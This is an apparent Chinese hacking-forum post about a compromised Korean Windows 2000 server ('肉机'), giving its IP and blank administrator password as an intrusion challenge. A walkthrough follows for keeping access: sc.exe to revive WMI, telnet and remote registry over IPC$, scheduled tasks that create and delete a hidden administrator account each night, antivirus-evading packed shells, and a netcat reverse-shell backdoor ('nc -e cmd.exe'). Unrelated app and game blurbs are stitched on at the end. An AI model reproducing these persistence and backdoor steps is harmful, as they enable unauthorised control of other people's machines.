你能拿到这台机的一个文件吗

首先申明,我很菜的,绝对是一个菜鸟。今天忽然很有兴趣想跟我一样菜的菜鸟来玩这个游戏。当做一个小测试吧。所以如果你是高手的话就不用往下看了。今天花了点时间对台肉机作了点小小的安全配置。韩国机。没做IP策略。没做端口过滤。端口开放:21,25,80,135,139,445,3306,3389211.42.93.200administrator 密码为空。(绝对是管理员帐号)任务是:拿到c:\winnt\system.txt,读出里面的内容。说明:至少有3种以上的方法可进入主机答案是用sc.exeSORRY,由于我的疏忽(我只检查了2次),造成无法IPC连接。因为是弱口令,所以之前已经有同行进入肉机并且做了个BAT文件来删除IPC$.而我也只是断了他留下了的后门(当时并没有发现这个BAT文件,真失败),所以后来我看到有人说无法IPC连接,我才上去net share ipc$这个“小游戏”是我又看了沉睡不醒的<>一时兴起做的,目的是想看大家的思路,下面是我的具体做法和对<>的一点补充:1,查看补丁情况HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\HotFix发现已打了SP3补丁,省事,倒也省了我不少工夫。2,修改注册表,禁止空连接,删除admin$,C$,D$等等。关掉Admin$ 服务器: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters AutoShareServer = DWORD:00000000 工作站: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters AutoShareWks = DWORD:00000000 禁止空会话: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA RestrictAnonymous = DWORD:00000001 或者“控制面板”-“本地(域)安全策略”-“安全选项”里...... 立刻从新启动lanmanserver服务,使其生效。注意:现在并没有删除IPC$连接。3,看一下有没有可疑帐号,如肉机是server以下版本,用CCA.EXE查看是否有克隆帐号,如是AD-server就看一下管理员有没有可疑帐号,有就删除它吧。4,我在肉机上装了RADMIN,winshell(脱壳并加壳,目的是防止被杀毒软件杀掉),WinEggDrop Shell。为了防止其他人进入肉机,用WinEggDrop Shell的fport功能,打开“服务”窗口看一下没有可疑服务,进程,有的话就停服务杀进程(pskill),删除相关的程序。5,虽然有开80端口,但只是默认装了IIS,肉机本身并没有什么网站,而且而且也装了SP3,不会有什么漏洞。更详细的资料请看<>6,服务”-“snmp service”-“属性页”-“安全”那个“接受团体名称”也就是“public”,它就是snmp访问口令。把它改成一个安全的口令。小心!一些暴力破解。这个漏洞,危害虽然没有那么直接,但还是有的,暴露系统的类型和具体的版本,获取帐号列表,运行服务信息.....。 7,开了3306端口,用的mysql,没有什么漏洞。如是MSSQL,就要小心了,看看补丁情况,没补的话就补上吧。8,虽然现在除了IPC$,没有什么C盘D盘的共享了,但已防万一,把at.exe改一下名。禁用并停止WMI服务,禁用并停止再删除telnet服务(从注册表中删除)9,停止远程注册表服务(Remote Registry Service),这个也很危险喔)10,虽然administrator是管理员帐号,但是我禁止了它登陆终端服务器)。好了,现在用终端连接服务器,opentelnet RTCS.vbe,psexec也连不上了。因为psexec默认用的c:\winnt\system32\cmd.exe,但删除C$,所以使用psexec显示拒绝访问。我试过建个共享文件夹,copy个cmd.exe到这个文件共享文件夹,然后再用psexec也不行。那现在只能用的是ipc$,也到了SC.EXE出场了,一个常被人忘记的程序。我们只是禁用并停止了WMI服务,但我们仍然可以用打开WMI服务,而不用理会这个服务是否禁用,是否需要手动开启。而且就算这个服务被删除了,我们也可以重新创建它。sc \\ip config WinMgmt start= auto看到命令成功的提示了吗?那现在就可以用eva的那个RTCS.vbe来telnet了,同样,可以利用还有telnet服务。如果你用终端连接服务器登陆的话会发现administrator没有登陆会话权,其实只是“计算机管理”-帐号-“属性”-“禁止登陆终端服务器”而已。用sc开启远程注册表服务,然后“连接网络注册表”修改注册表使其重新启动后可以登陆。其实我们大可做ipsec来过滤掉135,135,445端口,但这样做改动太大,怕管理员发现,而且肉机如果是日文,韩文,那怎么办?如果我们做了个BAT文件来删除IPC$,并且每次随肉机启动而运行。这个连sc.exe也没用了。我们还有下面的做法,利用计划任务,这个方法是星云大哥以前提过的1).在晚上10点运行这个3个命令net share ipc$net user user password /addnet localgroup administrators user /add2).在早上6点运行这个3个命令net share ipc$ /delnet localgroup administrators user /delnet user user /del用命令行来做吧,够隐蔽其实我们还可以加个 nc 你的本机IP 54 >> nc -e cmd.exe上去上面的程序行,(当然这个nc.exe是传上去的,不过小心被杀掉,一般杀素软件都认为nc.exe是病毒)然后在本机用nc -l -p 54这时nc就会反向发一个shell给你,防火墙就会为你转发数据。数一数,装了5个后门1,Radmin2,WinEggDrop Shell3,winshell4,计划任务来建用户,也算后门吧5,nc.exe开反向连接后门本文写得很乱,也没有一点技术的细节,因为我太菜,上面只是我的一点体会让我们一起进步吧。。。
《原神》1.6版本对剧变反应进行了改动,其中受益很大的砂糖在现版本非常强势,想要了解砂糖武装的玩家请看下面小编为大家带来的《原神》砂糖武装阵容玩法指南,希望大家能够喜欢,原神砂糖武装阵容玩法介绍 原神砂糖武装阵容玩法指南
2021-06-22
无他相机最新版本下载-无他相机app是一款素颜也能拍大片!涵盖各类眉形、睫毛、眼线、口红、腮红等满足所有少女心,实时预览上妆效果,随心切换,晋升美妆达人,您可以免费下载安卓手机无他相机。
2023-02-22
可约app下载,一款整合同城资源的技能资源预约平台,通过可约app小伙伴们可以随时在线约课,涵盖体育运动,时尚穿搭,旅游,音乐等,有需要就来下载。
2022-11-11
无尽模式世界竞赛高级钻石赛场入场费是多少钻石?这里说的无尽模式是雷霆战机,那么雷霆战机无尽模式世界竞赛高级钻石赛场入场费是多少钻石?下面就一起来看看雷霆战机9月27日每日一题答案吧。,雷霆战机 无尽模式世界竞赛高级钻石赛场入场费是多少钻石?
2015-09-27
拼东到家app下载-拼东到家app是一款2小时送达的身边购物超市的软件平台。拼东到家app同城2小时送达,专人直送,没有暴力分拣。中途没有任何中转,一步到位。很快捷方便,您可以免费下载安卓手机拼东到家。
2018-01-24
王者荣耀桃园结义指定英雄有哪些?近日王者荣耀开启了久别重逢活动,用指定英雄完成任务可获得丰厚奖励,那指定英雄有哪些呢?下面和小编一起看看桃园结义指定英雄盘点吧!,王者荣耀桃园结义指定英雄有哪些 桃园结义指定英雄盘点
2017-08-22
纪元2070虽然很多核心元素并未改变,但是新的经济焦点为游戏带来了很多新东西。当然了,虽然我被《纪元2070》美丽的外表所魅惑,但是真正使其成为一部优秀作品的使它的深度和才智,纪元2070怎么玩秘籍
2012-08-02
地球防卫军4.1绝望阴影再袭怎么玩?很多玩家刚进入游戏对整个游戏的玩法操作都不太了解,如何快速上手走入正轨呢?下面我们就来看一看地球防卫军4.1绝望阴影再袭新手开局玩法攻略,地球防卫军4.1绝望阴影再袭怎么玩 新手开局玩法攻略
2016-07-19
喵趣漫画是款好用的漫画软件,选择不同的分类来进行体验吧,各种版块内容满足用户的需求,快速搜索你最喜爱的漫画来进行观看,免费的内容实时更新纯净体验,支持本地缓存!
2024-01-23
嫖影app安卓版下载-嫖影app安卓版下载是一款非常不错的影视资源软件,嫖影软件可依据用户的浏览历史为用户推荐类似内容的影片;提供完整的分类目录,方便用户查找喜爱的类型。,您可以免费下载安卓手机嫖影。
2023-08-03